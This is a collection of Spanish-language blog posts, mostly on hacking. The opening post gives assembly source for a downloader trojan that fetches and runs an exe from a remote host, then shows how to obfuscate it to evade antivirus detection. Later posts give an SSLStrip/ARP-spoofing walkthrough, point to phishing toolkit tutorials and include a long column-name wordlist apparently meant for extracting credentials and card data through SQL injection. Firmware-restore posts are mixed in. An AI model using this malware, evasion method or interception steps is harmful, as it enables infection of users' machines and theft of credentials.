Los antivirus y sus "poderosas" heurísticas ...

Los antivirus y sus "poderosas" heurísticas ...: "En este post vamos a ver cuán sencillo es hacer indetectable un troyano. Cogeremos el más simple posible, Troyan.Downloader, un pequeño programa que se baja un exe de una página web y lo ejecuta con CreateProcess.

Éste es el código fuente original, que compila bajo masm32:

.386
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive

include \MASM32\INCLUDE\windows.inc
include \MASM32\INCLUDE\kernel32.inc
include \MASM32\INCLUDE\urlmon.inc
include \MASM32\INCLUDE\shell32.inc

includelib \MASM32\LIB\kernel32.lib
includelib \MASM32\LIB\urlmon.lib
includelib \MASM32\LIB\shell32.lib

; #########################################
.data
web db 'http://mitroyano.com/test.exe',0
open db 'open',0
dir db 'test.exe',0 (0) ; buffer for command line
pinfo dd 4 dup (0) ;process handles
startupinfo db 48h dup (0) ;startup info for the process were opening

.code

start:
push NULL
push 0
push offset dir
push offset web
push NULL
CALL URLDownloadToFile

push offset pinfo
push offset startupinfo
push NULL
push NULL
push NULL
push TRUE
push NULL
push NULL
push NULL
push offset dir ; Pointer to name of executable mod
call CreateProcessA

push 0
call ExitProcess

end start

; ####################


He marcado en negrita las tres cosas que son importantes en cuánto a comportamiento vírico se refiere:

(1) un string de una web de dónde se descarga el exe: http://...
(2) la llamada a URLDownloadToFile
(3) la llamada a CreateProcess.

Éste es el análisis del virus antes de modificarlo.

Por cierto, ya es bastante grave que antivirus como F-PROT, AVG, bitdefender no cataloguen correctamente nuestro troyano. Pero sigamos.



Ahora haremos un pequeño cambio. Subsituiremos http por wttp y restauraremos el string al principio del programa:




web DB 'wttp://mitroyano.com/troyano.exe', 0
[...]
Lea Eax, [web]
Mov Byte Ptr [Eax], 'h'

Con esto, nos quitamos de encima uno de los antivirus (avira). Aquí tenéis el análisis.

http://scanner.novirusthanks.org/analysis/e97f5f997c712b39eb038b03db949d7c/UHJveWVjdG8xLmV4ZQ==/

Nuestro siguiente paso va a ser quitar esa llamada tan fea que tenemos a
URLDownloadToFile, que canta muchísimo. ¿Cómo? Pues simplemente vemos con un debugger la primera instrucción que ejecuta la función, que en este caso es mov edi, edi, la copiamos en nuestro programa y luego llamamos a la API con un call eax:

Push NULL
Push 0
push offset dir
push offset web
Push NULL
;Call URLDownloadToFile
Mov Edi, Edi
Mov Eax, URLDownloadToFile
Inc Eax
Inc Eax
Call Eax

Notar que hemos puesto dos inc eax porque la longitud de la instrucción mov edi, edi es dos.

Después de tan complicado cambio, el resultado es que tan sólo Dr.Web lo detecta. ¿Análisis heurístico? ¿Sandboxes? Mejor no digo nada ...

Fuente: http://hacking-avanzado.blogspot.com

"

iPhoDroid 0.6 beta.

iPhoDroid 0.6 beta.: "

Hola iPhoniatico, con este sencillo paquete, podras convertir tu iPhone 2G & 3G, en un Android, por ahora solo disponilbe para Mac.

Descargar Aplicación :

• http://www.megaupload.com/?d=R1B2K46M


• http://hotfile.com/dl/46632117/08d4e66/iPhodroid.zip.html

El proceso para la instalación es un poco largo y seguido de varios procesos que tendras que ir aceptando, tendras que descargar Mcfuse, que la misma aplicación te mandara.

"

Solucion para Restaurar iPhone & iPod Touch Firmware 3.1.3 o 3.1.2

Solucion para Restaurar iPhone & iPod Touch Firmware 3.1.3 o 3.1.2: "

Hola iPhoniaticos, me he topado ultimamente con bastantes usuarios que no han podido restaurar el firmware 3.1.3 por medio de iTunes ya que les manda un error 1015, o simplemente la instalacion del firmware se queda trabada a media restauracion o hacia el final de esta, este es un tutorial que yo utilice para restaurar firmware 3.1.3 en un iPhone 3G pero debe funcionar para cualquier dispositivo. SOLO WINDOWS

Requisitos:

• Tener iPhone o iPod Touch firmware 3.1.3 intentando restaurar.


• Si el iPhone o iPod Touch es modelo MC, por favor descarguense el firmware original que iTunes les da, no descarguen otros porque no se los aceptará durante la restauracion, les dira que no es compatible a pesar de ke si lo sea. Si el iPhone o iPod no es modelo MC, pueden descargarse el firmware restore disponible en iPhoneate: http://iphoneate.com/firmware-para-iphone-ipod-touch/


• Tener iTunes 9.1 en adelante.


• Descargar iRecovery & LibUSB

Descarga iRecovery & LibUSB para Windows:

• http://www.megaupload.com/?d=TX0YK9M0


• http://hotfile.com/dl/47056027/f6ef07d/CrazyRemoteServerInstaller1.1.0.1.rar.html

¿Qué hacer?

1.- Descarga el archivo de alla arriba, que contiene iRecovery y LibUSB, descompriman el archivo y dentro de la carpeta encontraran ambos programas, copien el iRecovery.exe en su escritorio y lo dejan ahi no lo abran, por otra parte el LibUSB si tienen ke ejecutarlo, es un instalador, despues de ejecutarlo aparentemente no cambiaran nada en su Pc pero ya estara instalado, corran la aplicación y denle Refresh, luego cierren. Si la instalacion es correcta veran algo como esto:

NOTA: LibUSB tiene que ponerse en compatibilidad con Windows XP ServPack 2 y ejecutarlo como administrador para que funcione, el iPhone o iPod no debe estar conectado a la pc durante el proceso de instalacion, les dejo un video de como hacerlo:

Pinche aquí para ver el vídeo

2.- Una vez hecho esto conecten su iPhone o iPod a la pc, y ponganlo en Recovery Mode, esto es que en la pantalla de su dispositivo aparezca la imagen de iTunes y un cable USB (presiona home+power por 10 segundos y luego suelta).

3.- Una vez hecho esto, su iTunes reconocerá el dispositivo y presionan shift+restaurar y seleccionan el firmware 3.1.3 que descargaron, o si usaran el orignal solo presionen restaurar y automaticamente iTunes descargara e intentara instalar el firmware 3.1.3.

4.- Lo que ocurre a continuación es que supuestamente la restauracion empieza, y lo mas probable es que nos salga la manzanita y la linea de carga del firmware, pero llegara un punto en que no avanza o se queda ahi trabado y nomas no avanza, normalmente nos desesperamos y desconectamos e intentamos de nuevo, lo que yo recomiendo es esperar, se que demora mucho, pero esperen el tiempo que sea necesario, pues al final del tiempo iTunes terminara por enviarnos un error 1015, este es el error que necesitamos. ¿Cuanto tiempo esperar? Bueno pues dependera de la paciencia de nosotros, yo espere aproximadamente media hora o tal vez un poco mas.

5.- Una vez que tengamos el odiado error 1015 damos click en aceptar y cerramos iTunes. Abrimos nuestra terminal MS-DOS o tambien llamado Simbolo del sistema. (Recuerden que su iPod o iPhone quedara en modo recovery es decir con el cable usb y el icono de itunes en su pantalla):

En la terminal escribiremos respetando los espacios:

cd desktop (dan enter o intro)

iRecovery.exe -s (dan otro intro y les apareceran los datos de su iphone o ipod, hay un espacio entre iRecovery.exe y -s)

setenv auto-boot true (dan enter)

saveenv (dan enter)

fsboot (otro enter)

exit (otro enter)

6.- Al terminar el proceso anterior, desconecta tu iPhone o iPod Touch y presiona home+power por unos segundos, se apagara y luego volver a aparecer la manzana en tu iphone, en ese momento sueltas los botones y vuelves conectar tu iPhone o iPod a la PC, debe entonces terminar la restauracion adecuadamente sin tener que hacer nada mas que esperar que inicie normalmente y listo desbloqueen y tendran su iPhone o iPod Touch restaurado.

Espero que les sirva, tienen que ser pacientes y seguir el tutorial al pie de la letra.

"

Video Tutoriales de Metasploit Framework

Video Tutoriales de Metasploit Framework: "

El 8 de mayo de 2010, la AISS Kentuckiana realizó una capacitación de siete horas en el Brown Hotel de Louisville Kentucky Las ganancias recaudadas en la capacitación fue para el programa de Alimentos por Trabajo de “Hackers For Charity”. Los instructores fueron David “ReL1K” Kennedy, Martin “PureHate” Bos, Elliott “Nullthreat” Cutright, Pwrcycle y Adrian “Irongeek” Crenshaw.

A continuación se muestran los vídeos del evento. Espero que los disfruten.

• Metasploit Intro – Irongeek (Descargar Vídeo – Descargar Diapositivas – Ver Online)


• Metasploit Scanning and Pivoting – Pwrcycle (Descargar Vídeo – Descargar Diapositivas – Ver Online)


• Metasploit Fuzzing and Exploit Development – Nullthreat (Descargar Vídeo – Descargar Diapositivas – Descargar Archivos – Ver Online)


• Meterpreter and Post Exploitation (and a demo of Metasploit Express) – Purehate (Descargar Vídeo – Descargar Diapositivas – Ver Online)


• Social Engineering Toolkit – ReL1K (Descargar Vídeo – Ver otro Video Tutorial de SET – Ver Online)


• More Encoding Fun, Fasttrack and Closing – ReL1K (Descargar Vídeo – Ver Online)

Nota: Si deseas descargar todos los vídeos, seguramente te servirá este enlace, donde encontraras los vídeos en diferentes formatos, para que bajes el que mejor se acomode a tus necesidades.

Mas Información:

Metasploit Class Videos

Clases de Metasploit en video

También puede interesarte...

• Manual de Metasploit Framework en Español
• Manual en español de Meterpreter
• Creando un Exploit Paso a Paso
• Vídeo: Introducción al Metasploit Framework
• Video Tutorial SET (Social Engineering Toolkit)
• Metasploit Framework 3.3.2
• SSLStrip – Espiando tráfico SSL
• Memorias del DISI 2009

"

SSLStrip – Espiando tráfico SSL

SSLStrip – Espiando tráfico SSL: "

Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede espiar tu trafico SSL sin problemas.

El funcionamiento de SSLStrip es simple, reemplaza todas las peticiones “https://” de una página web por “http://” y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.

A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.

En resumen, los pasos serian:

1. Configurar IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Realizando ataque ARP MITM entre las 2 maquinas:

arpspoof -i eth0 -t VICTIMA HOST

3. Redireccionar trafico con iptables:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4. Iniciar SSLStrip en el puerto utilizado

python sslstrip.py -w archivo

Espero que les sea de utilidad y no olviden comentar

Mas Información:

Pagina Oficial del SSLStrip

También puede interesarte...

• Video Tutoriales de Metasploit Framework
• Creando un Exploit Paso a Paso
• Vídeo Tutorial de IPTables
• Video Tutorial, Cómo descargar y editar archivos Flash (SWF)
• Tus busquedas en Google ahora Cifradas
• Prueba de Penetración en el Mundo Real
• Manual de Metasploit Framework en Español
• Análisis del Fallo en el Generador de Números Aleatorios de OpenSSL/Debian

"

Video Tutorial SET (Social Engineering Toolkit)

Video Tutorial SET (Social Engineering Toolkit): "

La ingeniería social es una de las puertas de acceso mas utilizadas por los delincuentes, para robar tu información personal o infiltrarse en una empresa. Por este motivo cada pentest que realicemos a una organización, siempre debe incluirse técnicas de ingeniería social, para ver que tan vulnerable es la empresa a este tipo de ataques y tomar las medidas correspondientes.

SET (Social Engineering Toolkit) es un kit de herramientas que nos ayudara en la tarea de realizar ataques de ingeniería social, nos permite suplantar fácilmente la identidad de un sitio determinado, o enviar ataques por mail a las cuentas de correo de la compañía, infectar memorias usb o cds/dvds infectados, todo esto perfectamente integrado con el grandioso Metasploit Framework.

A continuación, les dejo una serie de vídeo tutoriales para aprender a utilizar correctamente este kit de herramientas, espero que lo disfruten:

Parte 1 – Introducción

Parte 2 – Credential Harvester

Parte 3 – Ataque JAVA Applet

Parte 4 – Creando Phishing

Mas Información:

Social-Engineering Toolkit

También puede interesarte...

• Manual en español de Meterpreter
• Manual de Metasploit Framework en Español
• Vídeo: Introducción al Metasploit Framework
• Creando un Exploit Paso a Paso
• Metasploit Framework 3.3.2
• Metasploit Framework 3.2 Portable para Windows
• Metasploit Framework Portable
• ¿Cuáles fueron las armas que más usaron los “hackers” en 2007?

"

lista de columna para agregar

lista de columna para agregar: "AdminUID
Administratorzy
Adres e-mail
Dostawcy
HasłoUżytkownika
Kod
MojeImię
Nazwisko
Numer
Ochrona de la vie priv e
Page d'accueil
Rachunki
Spis
Strefa Zarejestrowanych
Strona startowa
Uwierzytelnianie
Użytkownik
about
acc s
access
accnt
accnts
account
accounts
acc�s
adid
adm
adm_email
adm_hash
adm_id
adm_login
adm_mail
adm_pas
adm_pasd
adm_pass
adm_passwd
adm_password
adm_pasw
adm_paswd
adm_pasword
adm_pswd
adm_pw
adm_pwd
admemail
admhash
admid
admin
admin_email
admin_hash
admin_id
admin_login
admin_mail
admin_name
admin_pas
admin_pasd
admin_pass
admin_passwd
admin_password
admin_pasw
admin_paswd
admin_pasword
admin_pswd
admin_pw
admin_pwd
admin_user
admin_userid
admin_username
adminemail
adminhash
adminid
administrateur
administrator
administrator_name
administrators
adminlogin
adminmail
adminname
adminpas
adminpasd
adminpass
adminpasswd
adminpassword
adminpasw
adminpaswd
adminpasword
adminpaw
adminpswd
adminpw
adminpwd
admins
adminuser
adminuserid
adminusername
admlogin
admmail
admpas
admpasd
admpass
admpasswd
admpassword
admpasw
admpaswd
admpasword
admpswd
admpw
admpwd
adres_e-mailowy
adresse e-mail
aid
aide
aim
aim_name
alb_password
album_id
albumname
apwd
auid
autentyczności
auth
authenticate
authentication
authentification
authentifier
blog
blogmail_account
blogmail_password
board_email
cansendemail
caroline-du-nord
cc_expires
cc_number
cc_owner
cc_type
cel
cfg
ci_accountname
ci_email
cid
client
clientid
clientname
clientpassword
clients
clientusername
complet
compte
comptes
conf
config
connexion
contact
converge_email
converge_id
converge_pass_hash
converge_pass_salt
crack
customer
customers
customers_email_address
customers_password
cvvnumber]
członek
członków
danych
data
db_database_name
db_hostname
db_password
db_username
de donn�es
de s�rie
displaygroupid
dostęp
download
e-mail
e_mail
ecolo
email
email_full
email_pm
emailaddress
emailnotification
emailonpm
emailstamp
emer
emni
emniplote
emri
es de Donn
fid
fissure
fjalekalimi
fjalekalimin
forumname
full
gid
group
group_id
group_id_misc
group_name
groupe
grp_id
grupy
hachage
hash
hashsalt
hasło
hasło_bazy_danych
homepage
i_xar_roles_email
i_xar_roles_name
icq
icq_number
id
id_group
id_member
ignatiusj
images
ime
imię
index
ip
ip_addr
ip_address
ipaddress
key
klient
klientów
kodi
konta
kontakt
konto
korisnici
korisnik
kpro_user
languageid
last_ip
last_login
lastname
legacy_password
license_number
lid
llogaria
log
login
login_admin
login_anonymous
login_hash
login_id
login_name
login_pas
login_pasd
login_pass
login_passwd
login_password
login_pasw
login_paswd
login_pasword
login_pswd
login_pw
login_pwd
login_user
login_username
loginhash
logini
loginid
loginkey
loginout
loginpas
loginpasd
loginpass
loginpasswd
loginpassword
loginpasw
loginpaswd
loginpasword
loginpswd
loginpw
loginpwd
logins
loginów
logo
logohu
logout
lozinka
mail
mapid
md5hash
mem_login
mem_pass
mem_passwd
mem_password
mem_pwd
member
member_email
member_hash
member_id
member_login
member_login_key
member_mail
member_name
member_pas
member_pasd
member_pass
member_passwd
member_password
member_pasw
member_paswd
member_pasword
member_pswd
member_pw
member_pwd
memberemail
membergroupids
memberhash
memberid
memberip
memberlogin
membermail
membername
memberpas
memberpasd
memberpass
memberpasswd
memberpassword
memberpasw
memberpaswd
memberpasword
memberpswd
memberpw
memberpwd
members
membre
membres
memlogin
mempassword
mima
mon_mot_de_passe
monmotdepasse
mot de passe
mot_de_passe_bdd
msnname
my_email
my_name
my_password
my_username
myname
mypassword
myusername
name
name_email
name_hash
name_id
name_login
name_mail
name_pas
name_pasd
name_pass
name_passwd
name_password
name_pasw
name_paswd
name_pasword
name_pswd
name_pw
name_pwd
nameemail
namehash
nameid
namelogin
namemail
namepas
namepasd
namepass
namepasswd
namepassword
namepasw
namepaswd
namepasword
namepswd
namepw
namepwd
nazwa_użytkownika
nc
new
news
nick
nick_email
nick_hash
nick_id
nick_login
nick_mail
nick_pas
nick_pasd
nick_pass
nick_passwd
nick_password
nick_pasw
nick_paswd
nick_pasword
nick_pswd
nick_pw
nick_pwd
nickemail
nickhash
nickid
nicklogin
nickmail
nickpas
nickpasd
nickpass
nickpasswd
nickpassword
nickpasw
nickpaswd
nickpasword
nickpswd
nickpw
nickpwd
nom
nom d'utilisateur
nombre
nouveau
nowości
nowy
number
nummer
o
objectif
obrazy
org_perm_id
p_assword
p_word
page_id
param Tre
param�tre
parentemail
partner
pas
pasd
pass
pass1word
pass_hash
pass_w
pass_word
passer
passtemp
passw
passwd
password
passworddate
passwordsalt
passwort
passwrd
pasw
paswd
pasword
perdorimi
perdoruesi
personal_key
pełny
phone
pid
pntomail
pobrać
pomoc
privacy
propos de
protection de la vie priv�e
prywatność
przechowywać
psw
pswd
punetoret
punonjes
pw
pwd
pword
pwrd
realizacji celów
realname
recherche
referenceid
referrerid
regip
registration_ip
reputationlevelid
rysa
salt
sb_admin_name
sb_pwd
search
secretanswer
secretquestion
sel
sendemail
serial
seryjny
session_id
session_ip_address
session_member_id
session_member_login_key
session_member_name
sesskey
setting
short_name
showemail
sid
sifra
sklep1
sklep2
smtp_host
smtp_password
smtp_username
spacer
stan
status
stocker
store
store1
store2
store3
store4
styleid
szemailaddress
szukać
sól
t l telefonu
t l ładowarki
table_prefix
tat
tekst
telefon
temp_pass
temp_password
temppass
temppasword
text
texte
t�l�charger
t�l�phone
u_name
uid
un
uname
usebb_bans
user
user1
user_admin
user_aim
user_email
user_hash
user_hide_email
user_icq
user_id
user_ip
user_level
user_login
user_mail
user_n
user_name
user_name_email
user_name_hash
user_name_id
user_name_login
user_name_mail
user_name_pas
user_name_pasd
user_name_pass
user_name_passwd
user_name_password
user_name_pasw
user_name_paswd
user_name_pasword
user_name_pswd
user_name_pw
user_name_pwd
user_nameemail
user_namehash
user_nameid
user_namelogin
user_namemail
user_namepas
user_namepasd
user_namepass
user_namepasswd
user_namepassword
user_namepasw
user_namepaswd
user_namepasword
user_namepswd
user_namepw
user_namepwd
user_newpasswd
user_newpwdkey
user_nm
user_pas
user_pasd
user_pass
user_passw
user_passwd
user_password
user_pasw
user_paswd
user_pasword
user_pswd
user_pw
user_pwd
user_pword
user_pwrd
user_table
user_un
user_uname
user_usern
user_username
user_usernm
user_usernun
user_usrnm
user_viewemail
user_website
useradmin
useremail
usergroupid
userhash
userid
userip
userlogin
usermail
usern
username
username_email
username_hash
username_id
username_login
username_mail
username_pas
username_pasd
username_pass
username_passwd
username_password
username_pasw
username_paswd
username_pasword
username_pswd
username_pw
username_pwd
usernameemail
usernamehash
usernameid
usernamelogin
usernamemail
usernamepas
usernamepasd
usernamepass
usernamepasswd
usernamepassword
usernamepasw
usernamepaswd
usernamepasword
usernamepswd
usernamepw
usernamepwd
usernm
userpas
userpasd
userpass
userpasswd
userpassword
userpasw
userpaswd
userpasword
userpswd
userpw
userpwd
users
usr
usr2
usr_email
usr_hash
usr_id
usr_login
usr_mail
usr_n
usr_name
usr_pas
usr_pasd
usr_pass
usr_passwd
usr_password
usr_pasw
usr_paswd
usr_pasword
usr_pswd
usr_pw
usr_pwd
usremail
usrhash
usrid
usrlogin
usrmail
usrn
usrnam
usrname
usrnm
usrpas
usrpasd
usrpass
usrpasswd
usrpassword
usrpasw
usrpaswd
usrpasword
usrpswd
usrpw
usrpwd
usrs
ustawienie
ustid
utilisateur
utilisateurs
uwierzytelnienia
użytkowników
version
warez
website
wp_users
xar_email
xar_name
xar_pass
xar_uid
xar_uname
y de Rie
zaloguj
zip
zytk
� propos de
�tat

"